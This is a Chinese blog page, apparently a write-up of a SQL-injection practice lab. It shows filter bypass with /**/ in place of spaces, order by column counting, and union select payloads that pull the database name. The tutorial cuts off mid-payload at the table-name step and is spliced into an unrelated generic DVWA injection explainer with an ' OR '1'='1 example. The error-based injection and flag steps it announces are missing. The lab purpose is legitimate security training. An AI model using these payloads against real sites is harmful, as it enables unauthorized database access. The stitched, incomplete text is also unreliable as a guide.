SQL靶场练习之二(空格绕过、报错注入)

本文介绍了SQL靶场练习中的空格绕过方法,通过在URL后添加特殊字符实现绕过。接着展示了如何判断SQL注入的存在,并探讨了字段、回显点的判断。此外,文章还详细讲解了查询数据库名、表名及内容的过程,以及报错注入的识别和利用,最后展示了查询flag值的步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

空格绕过

初始页面是这样的:
在这里插入图片描述

0x00判断是否存在注入

name后面加个单引号,发现页面返回异常:
在这里插入图片描述判断存在注入。

0x02常规拼接

name’ and 1=1
在这里插入图片描述返回异常,显示ERROR NO SPACE,错误无空格。想办法把空格取代掉,使用/**/拼接语句name’/**/and/**/1=1%23
在这里插入图片描述页面返回正常,说明绕过成功。

0x03判断字段

name’/**/order/**/by/**/5%23,页面返回正常,将5改成6则返回错误:
在这里插入图片描述说明字段为5。

0x04判断回显点

name’/**/union/**/select/**/1,2,3,4,5%23
在这里插入图片描述回显点为1,2,3.

0x05查询数据库名

name’/**/union/**/select/**/1,database(),3,4,5%23
在这里插入图片描述查询到数据库名为:erercises

0x06查询数据库中表名

name’/**/union/**/select/**/1,group_concat(table_name)
在DVWA(Damn Vulnerable Web Application)靶场中,初级SQL注入是一种常见的漏洞类型。SQL注入是一种攻击技术,通过在Web应用程序中注入恶意的SQL代码来绕过应用程序的安全控制,从而获取非法访问或执行未经授权的操作。 下面是一些在DVWA靶场中进行初级SQL注入的步骤: 1. 登录DVWA:首先,登录到DVWA靶场。你可以在浏览器中输入`http://localhost/dvwa/login.php`,然后使用默认的用户名和密码登录(默认用户名:admin,密码:password)。 2. 设置安全级别:DVWA有不同的安全级别可供选择。在这个例子中,将安全级别设置为"低"。你可以在页面顶部的安全选项中找到并选择安全级别。 3. 选择"SQL Injection":在DVWA的主菜单中,选择"SQL Injection"。这将带你进入一个页面,你可以在这个页面上进行SQL注入攻击。 4. 探测注入点:在页面上,你将看到一个输入框,用于输入用户ID。首先,尝试输入一个常规的用户ID(如1)并提交表单。观察页面的响应,看是否存在任何异常或错误信息。如果没有出现错误,则说明该输入点可能存在注入漏洞。 5. 进行注入攻击:在用户ID输入框中,尝试输入一些注入代码,如`' OR '1'='1`。这是一种常见的注入技巧,目的是绕过应用程序的验证逻辑。提交表单并观察页面的响应。如果页面显示了所有用户的信息,说明注入成功。 请注意,这只是一个简单的示例,实际的SQL注入攻击可能更加复杂。在实际环境中,进行SQL注入攻击是不道德和非法的,除非你有合法的授权和目的。在学习和测试过程中,务必遵守法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值